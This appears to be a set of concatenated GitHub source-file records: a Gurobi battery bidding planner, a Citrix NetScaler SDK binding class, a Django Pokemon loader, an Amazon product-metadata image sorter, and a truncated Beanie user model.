model.addConstrs((y_s[s,t] <= self.soc_max for s in self.s_set for t in self.t_set), name='c_max_s')\n\n # BESS dynamics first period\n model.addConstrs((y_s[s,0] - self.period_hours * (self.charge_eff * y_cha[s,0] - y_dis[s,0] / self.discharge_eff) == self.soc_ini for s in self.s_set), name='c_BESS_first_period')\n # BESS dynamics from second to last periods\n model.addConstrs((y_s[s,t] - y_s[s,t-1]- self.period_hours * (self.charge_eff * y_cha[s,t] - y_dis[s,t] / self.discharge_eff) == 0 for s in self.s_set for t in range(1, self.nb_periods)), name='c_BESS_dynamics')\n # BESS dynamics last period\n model.addConstrs((y_s[s, self.nb_periods-1] == 
self.soc_end for s in self.s_set), name='c_BESS_last_period')\n\n # -------------------------------------------------------------------------------------------------------------\n # 5. Store variables\n self.allvar = dict()\n self.allvar['x'] = x\n self.allvar['y'] = y\n self.allvar['y_short'] = y_short\n self.allvar['y_long'] = y_long\n self.allvar['y_PV'] = y_PV\n self.allvar['y_W'] = y_W\n self.allvar['y_L'] = y_L\n self.allvar['y_cha'] = y_cha\n self.allvar['y_dis'] = y_dis\n self.allvar['y_s'] = y_s\n self.allvar['y_b'] = y_b\n\n self.time_building_model = time.time() - t_build\n # print(\"Time spent building the mathematical program: %gs\" % self.time_building_model)\n\n return model\n\n def solve(self, LogToConsole:bool=False, logfile:str=\"\", Threads:int=0, MIPFocus:int=0, TimeLimit:float=GRB.INFINITY):\n\n t_solve = time.time()\n\n self.model.setParam('LogToConsole', LogToConsole) # no log in the console if set to False\n # self.model.setParam('OutputFlag', outputflag) # no log into console and log file if set to True\n # self.model.setParam('MIPGap', 0.01)\n self.model.setParam('TimeLimit', TimeLimit)\n self.model.setParam('MIPFocus', MIPFocus)\n # self.model.setParam('DualReductions', 0) # Model was proven to be either infeasible or unbounded. To obtain a more definitive conclusion, set the DualReductions parameter to 0 and reoptimize.\n\n # If you are more interested in good quality feasible solutions, you can select MIPFocus=1.\n # If you believe the solver is having no trouble finding the optimal solution, and wish to focus more attention on proving optimality, select MIPFocus=2.\n # If the best objective bound is moving very slowly (or not at all), you may want to try MIPFocus=3 to focus on the bound.\n\n self.model.setParam('LogFile', logfile) # no log in file if set to \"\"\n self.model.setParam('Threads', Threads) # Default value = 0 -> use all threads\n\n self.model.optimize()\n self.solver_status = self.model.status\n self.time_solving_model = time.time() - t_solve\n\n def store_solution(self):\n\n m = self.model\n\n solution = dict()\n solution['status'] = m.status\n if solution['status'] == 2 or solution['status'] == 9:\n solution['obj'] = m.objVal\n\n # 1 dimensional variables\n for var in ['x']:\n solution[var] = [self.allvar[var][t].X for t in self.t_set]\n\n # 2 dimensional variables\n for var in ['y', 'y_short', 'y_long', 'y_PV', 'y_W', 'y_L', 'y_dis', 'y_cha', 'y_s', 'y_b']:\n solution[var] = [[self.allvar[var][s, t].X for t in self.t_set] for s in self.s_set]\n\n solution['dad_profit'] = sum([solution['x'][t] * self.dad_prices[t] for t in self.t_set])\n solution['short_penalty'] = sum([sum([solution['y_short'][s][t] * self.imb_neg_prices[t] for t in self.t_set]) for s in self.s_set]) / self.nb_scenarios\n solution['long_penalty'] = sum([sum([solution['y_long'][s][t] * self.imb_pos_prices[t] for t in self.t_set]) for s in self.s_set]) / self.nb_scenarios\n solution['obj2'] = solution['dad_profit'] - (solution['short_penalty'] + solution['long_penalty'])\n else:\n print('WARNING model is not OPTIMAL')\n solution['obj'] = math.nan\n\n # 3. 
Timing indicators\n solution[\"time_building\"] = self.time_building_model\n solution[\"time_solving\"] = self.time_solving_model\n solution[\"time_total\"] = self.time_building_model + self.time_solving_model\n\n return solution\n\n def export_model(self, filename):\n \"\"\"\n Export the pyomo model into a cpxlp format.\n :param filename: directory and filename of the exported model.\n \"\"\"\n\n self.model.write(\"%s.lp\" % filename)\n # self.model.write(\"%s.mps\" % filename)\n\n\nif __name__ == \"__main__\":\n # Set the working directory to the root of the project\n print(os.getcwd())\n\n dir_path = '../../../elia_case_study/bidding/export/dad_bidding/'\n if not os.path.isdir(dir_path): # test if directory exist\n os.makedirs(dir_path)\n\n soc_max = 500\n\n q_pos = 2\n q_neg = 2\n\n dad_price = 100 # euros /MWh\n # pos_imb = neg_imb = q * dad_price # euros /MWh\n pos_imb = q_pos * dad_price # euros /MWh\n neg_imb = q_neg * dad_price # euros /MWh\n gamma = (dad_price + pos_imb) / (pos_imb + neg_imb)\n print('dad_price %s pos_imb %s neg_imb %s GAMMA %s' % (dad_price, pos_imb, neg_imb, gamma))\n\n # load data\n df_gen = pd.read_csv('../../../elia_case_study/data/generation.csv', parse_dates=True, index_col=0)\n df_load = pd.read_csv('../../../elia_case_study/data/load.csv', parse_dates=True, index_col=0)\n df_dad = pd.read_csv('../../../elia_case_study/data/dad.csv', parse_dates=True, index_col=0)\n df_imb = pd.read_csv('../../../elia_case_study/data/imb.csv', parse_dates=True, index_col=0)\n\n nb_scenarios = 5\n pv = df_gen['PV true']['2020-1-1':'2020-1-'+str(nb_scenarios)]\n wind = df_gen['W on true']['2020-1-1':'2020-1-' + str(nb_scenarios)]\n load = 0.05 * df_load['load true']['2020-1-1':'2020-1-' + str(nb_scenarios)]\n\n # 20 scenarios\n scenarios = dict()\n scenarios['PV'] = pv.values.reshape(nb_scenarios,24)\n scenarios['W'] = wind.values.reshape(nb_scenarios, 24)\n scenarios['L'] = load.values.reshape(nb_scenarios, 24)\n\n # Plot point forecasts vs observations\n FONTSIZE = 10\n plt.figure()\n net = pv.values + wind.values - load.values\n plt.plot(pv.values, label='PV')\n plt.plot(wind.values, label='W on')\n plt.plot(load.values, label='Load')\n plt.plot(net, 'r', label='net')\n plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n prices = dict()\n prices['dad'] = np.asarray([dad_price]*16+[3*dad_price]*4+[dad_price]*4)\n prices['imb +'] = np.asarray([pos_imb]*16+[3*pos_imb]*4+[pos_imb]*4)\n prices['imb -'] = np.asarray([neg_imb]*16+[3*neg_imb]*4+[neg_imb]*4)\n\n # prices = dict()\n # prices['dad'] = df_dad['2020-1-3'].values.reshape(-1)\n # prices['imb +'] = q_pos * df_dad['2020-1-3'].values.reshape(-1)\n # prices['imb -'] = q_neg * df_dad['2020-1-3'].values.reshape(-1)\n\n plt.figure()\n plt.plot(prices['dad'], label='dad')\n plt.plot(prices['imb -'] , label='imb neg')\n plt.ylabel('€/MWh', fontsize=FONTSIZE, rotation='horizontal')\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n # Dad planner\n planner = Planner(scenarios=scenarios, prices=prices, soc_max=soc_max)\n planner.export_model(dir_path + 'planner_dad')\n planner.solve()\n sol_planner = planner.store_solution()\n #\n print('profit %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (sol_planner['obj'] / 1000, sol_planner['dad_profit'] / 1000, sol_planner['short_penalty'] / 1000, 
sol_planner['long_penalty'] / 1000))\n\n plt.figure()\n plt.plot(sol_planner['x'], 'r', label='planning')\n for s in range(nb_scenarios):\n # plt.plot(solution['y'][0], 'k',label='position')\n net = scenarios['PV'][s] + scenarios['W'][s] - scenarios['L'][s]\n # plt.plot(scenarios['PV'][s] + scenarios['W'][s], 'gray')\n # plt.plot(scenarios['L'][s], 'b')\n # plt.plot(solution['y_s'][0], 'orange',label='y_s')\n plt.plot(net, 'g', label='net=generation-load')\n plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n plt.ylim(-1000,2000)\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n # Economic dispatch based on actual realization of uncertainties\n np.random.seed(seed=0)\n # omega = np.random.randint(nb_scenarios, size=nb_scenarios)\n omega = range(nb_scenarios)\n res_O = []\n res_planner = []\n for s in omega:\n # pick a scenario\n scenarios_dispatch = dict()\n scenarios_dispatch['PV'] = scenarios['PV'][s,:].reshape(1, 24)\n scenarios_dispatch['W'] = scenarios['W'][s,:].reshape(1, 24)\n scenarios_dispatch['L'] = scenarios['L'][s,:].reshape(1, 24)\n\n # oracle\n oracle = Planner(scenarios=scenarios_dispatch, prices=prices, soc_max=soc_max)\n oracle.export_model(dir_path + 'planner_dad')\n oracle.solve()\n sol_oracle = oracle.store_solution()\n\n res_O.append(sol_oracle['obj'] / 1000)\n\n dispatch = Planner(scenarios=scenarios_dispatch, prices=prices, x=sol_planner['x'], soc_max=soc_max)\n dispatch.export_model(dir_path + 'dispatch')\n dispatch.solve()\n sol_dispatch = dispatch.store_solution()\n res_planner.append(sol_dispatch['obj'] / 1000)\n\n print('s %s net %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (s, sol_dispatch['obj'] / 1000, sol_dispatch['dad_profit'] / 1000, sol_dispatch['short_penalty'] / 1000, sol_dispatch['long_penalty'] / 1000))\n print('oracle net %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (sol_oracle['obj'] / 1000, sol_oracle['dad_profit'] / 1000, sol_oracle['short_penalty'] / 1000, sol_oracle['long_penalty'] / 1000))\n net = scenarios_dispatch['PV'][0] + scenarios_dispatch['W'][0] - scenarios_dispatch['L'][0]\n\n # plt.figure()\n # plt.plot(sol_oracle['x'], 'b', label='x oracle')\n # plt.plot(sol_planner['x'], 'r', label='planning')\n # plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n # plt.ylim(-1000,2000)\n # plt.title(str(s) + ' oracle vs planner')\n # plt.xticks(fontsize=FONTSIZE)\n # plt.yticks(fontsize=FONTSIZE)\n # plt.legend(fontsize=FONTSIZE)\n # plt.tight_layout()\n # plt.show()\n #\n # plt.figure()\n # plt.plot(sol_planner['x'], 'r', label='planning')\n # plt.plot(sol_dispatch['y'][0], 'k',label='position')\n # plt.plot(sol_dispatch['y_s'][0], 'orange',label='y_s')\n # # plt.plot(scenarios_dispatch['PV'][0] + scenarios_dispatch['W'][0], 'gray', label='generation')\n # # plt.plot(scenarios_dispatch['L'][0], 'b', label='load')\n # plt.plot(net, 'g', label='net=generation-load')\n # plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n # plt.ylim(-1000,2000)\n # plt.title(s)\n # plt.xticks(fontsize=FONTSIZE)\n # plt.yticks(fontsize=FONTSIZE)\n # plt.legend(fontsize=FONTSIZE)\n # plt.tight_layout()\n # plt.show()\n\n plt.figure()\n plt.plot(res_O, 'r', label='oracle')\n plt.plot(res_planner, 'k', label='planner')\n plt.ylabel('k€', fontsize=FONTSIZE, rotation='horizontal')\n plt.xlabel('scenarios', fontsize=FONTSIZE, rotation='horizontal')\n plt.ylim(-1000, 1200)\n plt.xticks(fontsize=FONTSIZE)\n 
plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n print('O %.2f planner %.2f' %(sum(res_O), sum(res_planner)))","repo_name":"jonathandumas/generative-models","sub_path":"GEFcom2014/forecast_value/dad_planner.py","file_name":"dad_planner.py","file_ext":"py","file_size_in_byte":19605,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"19"} +{"seq_id":"2623659504","text":"from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource\nfrom nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response\nfrom nssrc.com.citrix.netscaler.nitro.service.options import options\nfrom nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception\n\nfrom nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util\n\nclass sslcertkey_sslocspresponder_binding(base_resource) :\n\t\"\"\" Binding class showing the sslocspresponder that can be bound to sslcertkey.\n\t\"\"\"\n\tdef __init__(self) :\n\t\tself._ocspresponder = None\n\t\tself._priority = None\n\t\tself._certkey = None\n\t\tself._ca = None\n\t\tself.___count = 0\n\n\t@property\n\tdef priority(self) :\n\t\tr\"\"\"ocsp priority.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@priority.setter\n\tdef priority(self, priority) :\n\t\tr\"\"\"ocsp priority.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._priority = priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef ca(self) :\n\t\tr\"\"\"The certificate-key pair being unbound is a Certificate Authority (CA) certificate. If you choose this option, the certificate-key pair is unbound from the list of CA certificates that were bound to the specified SSL virtual server or SSL service.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._ca\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@ca.setter\n\tdef ca(self, ca) :\n\t\tr\"\"\"The certificate-key pair being unbound is a Certificate Authority (CA) certificate. If you choose this option, the certificate-key pair is unbound from the list of CA certificates that were bound to the specified SSL virtual server or SSL service.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._ca = ca\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef certkey(self) :\n\t\tr\"\"\"Name of the certificate-key pair.
    Minimum length = 1.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._certkey\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@certkey.setter\n\tdef certkey(self, certkey) :\n\t\tr\"\"\"Name of the certificate-key pair.
    Minimum length = 1\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._certkey = certkey\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef ocspresponder(self) :\n\t\tr\"\"\"OCSP responders bound to this certkey.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._ocspresponder\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@ocspresponder.setter\n\tdef ocspresponder(self, ocspresponder) :\n\t\tr\"\"\"OCSP responders bound to this certkey.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._ocspresponder = ocspresponder\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef _get_nitro_response(self, service, response) :\n\t\tr\"\"\" converts nitro response into object and returns the object array in case of get request.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tresult = service.payload_formatter.string_to_resource(sslcertkey_sslocspresponder_binding_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.sslcertkey_sslocspresponder_binding\n\t\texcept Exception as e :\n\t\t\traise e\n\n\tdef _get_object_name(self) :\n\t\tr\"\"\" Returns the value of object identifier argument\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif self.certkey is not None :\n\t\t\t\treturn str(self.certkey)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t@classmethod\n\tdef add(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tupdateresource = sslcertkey_sslocspresponder_binding()\n\t\t\t\tupdateresource.certkey = resource.certkey\n\t\t\t\tupdateresource.ocspresponder = resource.ocspresponder\n\t\t\t\tupdateresource.priority = resource.priority\n\t\t\t\treturn updateresource.update_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tupdateresources = [sslcertkey_sslocspresponder_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tupdateresources[i].certkey = resource[i].certkey\n\t\t\t\t\t\tupdateresources[i].ocspresponder = resource[i].ocspresponder\n\t\t\t\t\t\tupdateresources[i].priority = resource[i].priority\n\t\t\t\treturn cls.update_bulk_request(client, updateresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef delete(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tdeleteresource = sslcertkey_sslocspresponder_binding()\n\t\t\t\tdeleteresource.certkey = resource.certkey\n\t\t\t\tdeleteresource.ocspresponder = resource.ocspresponder\n\t\t\t\tdeleteresource.ca = resource.ca\n\t\t\t\treturn deleteresource.delete_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tdeleteresources = [sslcertkey_sslocspresponder_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tdeleteresources[i].certkey = resource[i].certkey\n\t\t\t\t\t\tdeleteresources[i].ocspresponder = resource[i].ocspresponder\n\t\t\t\t\t\tdeleteresources[i].ca = resource[i].ca\n\t\t\t\treturn cls.delete_bulk_request(client, deleteresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef get(cls, service, certkey=\"\", option_=\"\") :\n\t\tr\"\"\" Use this API to fetch 
sslcertkey_sslocspresponder_binding resources.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif not certkey :\n\t\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\telse :\n\t\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\t\tobj.certkey = certkey\n\t\t\t\tresponse = obj.get_resources(service)\n\t\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef get_filtered(cls, service, certkey, filter_) :\n\t\tr\"\"\" Use this API to fetch filtered set of sslcertkey_sslocspresponder_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count(cls, service, certkey) :\n\t\tr\"\"\" Use this API to count sslcertkey_sslocspresponder_binding resources configued on NetScaler.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count_filtered(cls, service, certkey, filter_) :\n\t\tr\"\"\" Use this API to count the filtered set of sslcertkey_sslocspresponder_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\nclass sslcertkey_sslocspresponder_binding_response(base_response) :\n\tdef __init__(self, length=1) :\n\t\tself.sslcertkey_sslocspresponder_binding = []\n\t\tself.errorcode = 0\n\t\tself.message = \"\"\n\t\tself.severity = \"\"\n\t\tself.sessionid = \"\"\n\t\tself.sslcertkey_sslocspresponder_binding = [sslcertkey_sslocspresponder_binding() for _ in range(length)]\n\n","repo_name":"MayankTahil/nitro-ide","sub_path":"nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/ssl/sslcertkey_sslocspresponder_binding.py","file_name":"sslcertkey_sslocspresponder_binding.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"12933681684","text":"from http.client import HTTPResponse\nimport json\nfrom api.models.pokemon import Pokemon\nfrom rest_framework import viewsets, permissions\nfrom api.serializers.pokemon import PokemonSerializer\n\n\ndef store_pokemon(request):\n with open(\"sample.json\", \"r\") as json_file:\n pokemon_list = json.load(json_file)\n for key, value in pokemon_list.items():\n print(key)\n pokemon = Pokemon(\n name=value[\"name\"].title(),\n pokedex_entry=value[\"id\"],\n type=value[\"type\"],\n default_sprite=value[\"default_sprite\"],\n shiny_sprite=value[\"shiny_sprite\"],\n )\n pokemon.save()\n return HTTPResponse({'status': 
200})\n","repo_name":"JaycobDuffel/pokedex-mobile-app","sub_path":"pokedex-api/api/api/views/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23870064981","text":"'''\n1. Important keys of each product:\n - `bullet_point`\n - Content: Important features of the products\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `color`\n - Content: Color of the product as text\n - Format: `[{\"language_tag\": , \"standardized_values\": [],\n \"value\": }, ...]`\n - `country`\n - Content: Country of the marketplace, as an\n [ISO 3166-1 alpha 2](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2)\n code\n - Format: ``\n - `domain_name`\n - Content: Domain name of the marketplace where the product is found.\n A product listing in this collection is uniquely identified by\n (`item_id`, `domain_name`)\n - Format: ``\n - `item_dimensions`\n - Content: Dimensions of the product (height, width, length)\n - Format: `{\"height\": {\"normalized_value\": {\"unit\": , \"value\":\n }, \"unit\": , \"value\": }, \"length\":\n {\"normalized_value\": {\"unit\": , \"value\": }, \"unit\": ,\n \"value\": }, \"width\": {\"normalized_value\": {\"unit\": ,\n \"value\": }, \"unit\": , \"value\": }}}`\n - `item_id`\n - Content: The product reference id. A product listing in this\n collection is uniquely identified by (`item_id`, `domain_name`).\n A corresponding product page may exist at\n `https://www./dp/`\n - Format: ``\n - `item_keywords`\n - Content: Keywords for the product\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_name`\n - Content: The product name\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_shape`\n - Content: Description of the product shape\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_weight`\n - Content: The product weight\n - Format: `[{\"normalized_value\": {\"unit\": , \"value\": },\n \"unit\": , \"value\": }, ...]`\n - `main_image_id`\n - Content: The main product image, provided as an `image_id`. See the\n descripton of `images/metadata/images.csv.gz` below\n - Format: ``\n - `material`\n - Content: Description of the product material\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `model_name`\n - Content: Model name\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `pattern`\n - Content: Product pattern\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `product_description`\n - Content: Product description as HTML \n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `product_type`\n - Content: Product type (category)\n - Format: ``\n - `style`\n - Content: Style of the product\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n \n2. A datasample of a product:\n {\"item_dimensions\": \n {\"height\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 12}, \"unit\": \"inches\", \"value\": 12}, \n \"length\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 12}, \"unit\": \"inches\", \"value\": 12}, \n \"width\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 1.5}, \"unit\": \"inches\", \"value\": 1.5}}, \n \"bullet_point\": [\n {\"language_tag\": \"en_US\", \"value\": \"These vintage lawn chairs may have seen better days, but they have obviously had a rebirth. Brightly painted, they've been repurposed as the hub of hang-out spot outside a warehouse. 
This colorful urban-look piece will add a bright spot to any room.\"}, \n {\"language_tag\": \"en_US\", \"value\": \"A modern colorful print with a vintage twist\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Printed on wood, framed in a white-painted wood frame\"}, \n {\"language_tag\": \"en_US\", \"value\": \"12\\\" x 12\\\"\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Made to order\"}], \n \"color\": [\n {\"language_tag\": \"en_US\", \"standardized_values\": [\"Multi\"], \"value\": \"Multicolor\"}], \n \"item_id\": \"B073P5PZ5P\", \n \"item_name\": [\n {\"language_tag\": \"zh_CN\", \"value\": \"Rivet \\u590d\\u53e4\\u84dd\\u8272\\u9ec4\\u8272\\u548c\\u7eff\\u8272\\u6905\\u5b50 \\u9ed1\\u8272\\u6728\\u6846\\u5899\\u58c1\\u827a\\u672f\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Amazon Brand \\u2013 Rivet Vintage Blue Yellow and Green Chairs in White Wood Frame Wall Art, 12\\\" x 12\\\"\"}], \n \"item_weight\": [{\"normalized_value\": {\"unit\": \"pounds\", \"value\": 2.5}, \"unit\": \"pounds\", \"value\": 2.5}], \n \"model_number\": [{\"value\": \"16523-frwa30\"}], \n \"product_type\": [{\"value\": \"HOME\"}], \n \"style\": [{\"language_tag\": \"en_US\", \"value\": \"White\"}], \n \"main_image_id\": \"91e1hw35cDL\", \n \"item_keywords\": [\n {\"language_tag\": \"en_US\", \"value\": \"framed-prints\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"canvas wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall art for living room\"}, \n {\"language_tag\": \"en_US\", \"value\": \"bathroom decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"posters\"}, \n {\"language_tag\": \"en_US\", \"value\": \"framed wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall decorations for living room\"}, \n {\"language_tag\": \"en_US\", \"value\": \"living room decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"cuadros de pared de sala\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Rivet\"}, \n {\"language_tag\": \"en_US\", \"value\": \"mid century\"}, \n {\"language_tag\": \"en_US\", \"value\": \"modern\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Multi\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Multi\"}, \n {\"language_tag\": \"en_US\", \"value\": \"12\\\"x12\\\"\"}], \n \"country\": \"US\", \n \"domain_name\": \"amazon.com\"\n'''\nimport json\nimport os\nimport cv2\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport glob\n\n\ndata_root = '/media/hxd/82231ee6-d2b3-4b78-b3b4-69033720d8a8/MyDatasets/amazon'\nattr = 'color' # product_type\nmax_num_values_per_attr = 25\n\n# load product\nproducts = []\njson_files = glob.glob(data_root + '/metadata/*.json')\nfor json_file in json_files:\n for line in open(json_file, 'r'):\n products.append(json.loads(line))\n# load image\nimg_info = pd.read_csv(data_root + '/images.csv')\n\nflag_auto_attr_value = True\nif not flag_auto_attr_value:\n ## (1) manually define attribute values\n attr_list = {\n 'color':['Black', 'White', 'Blue', 'Brown', 'Gray', 'Orange', 'Red', 'Yellow', 'Pink', 'Silver', 'Bronze', 'Cream', 'Walnut'], \n 'material':['Leather', 'Metal', 'Plastic', 'Glass', 'Rubber', 'Stoneware', 'Wood', 'Fabric', 'Memory_foam'],\n 'item_shape':['Rectangular', 'Ellipsoidal', 'Cubic', 'Round', 'Long', 'L-Shape'],\n 'style':['Modern', 'Contemporary', 'Traditional', 'Classic']}\n att_values = attr_list[attr]\n att_values = [x.lower() for x in att_values]\nelse:\n ## (2) obtain attribute 
values by frequency\n tmp_dic = {}\n for product in products:\n if attr in product.keys():\n if attr == 'product_type':\n att_value = [x['value'] for x in product[attr]]\n else:\n att_value = [x['value'] for x in product[attr] if x['language_tag'] == 'en_US']\n if len(att_value) > 0:\n att_value = att_value[0].lower()\n if att_value in tmp_dic.keys():\n tmp_dic[att_value] += 1\n else:\n tmp_dic[att_value] = 1\n\n top_values = dict(sorted(tmp_dic.items(), key=lambda item: item[1], reverse=True))\n att_values = list(top_values.keys())#[:max_num_values_per_attr]\n\nfor value in att_values:\n if not os.path.exists(data_root + '/img_by_attr/' + attr + '/' + value):\n os.makedirs(data_root + '/img_by_attr/' + attr + '/' + value)\n\n\nproduct_descr = {}\nfor product in products:\n description = []\n # if product['country'] == 'US' and \\\n if attr in product.keys() and \\\n 'main_image_id' in product.keys():\n if attr == 'product_type':\n att_value = [x['value'] for x in product[attr]]\n else:\n att_value = [x['value'] for x in product[attr] if x['language_tag'] == 'en_US']\n if len(att_value) > 0:\n att_value = att_value[0].lower()\n if att_value in att_values:\n img_id = product['main_image_id']\n img_path = img_info.loc[img_info['image_id'] == img_id]['path'].values[0]\n img = cv2.imread(data_root + '/small/' + img_path)\n cv2.imwrite(data_root + '/img_by_attr/' + attr + '/' + att_value + '/' + img_id + '.jpg', img)\n if 'bullet_point' in product.keys():\n description = [x['value'] for x in product['bullet_point'] if x['language_tag'] == 'en_US']\n product_descr[img_id] = description\n\nwith open(data_root + '/img_by_attr/' + attr + '/product_description.json', 'w') as json_file:\n json.dump(product_descr, json_file)","repo_name":"xiaodanhu/AttDiscovery","sub_path":"amazon/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"29489222118","text":"from beanie import Document, Link\nfrom pydantic import BaseModel, EmailStr\nfrom typing import Optional, List\nfrom models.event import Event\n\nclass User(Document):\n email: EmailStr\n password: str\n events: Optional[List[Link[Event]]]\n\n class Settings:\n name = 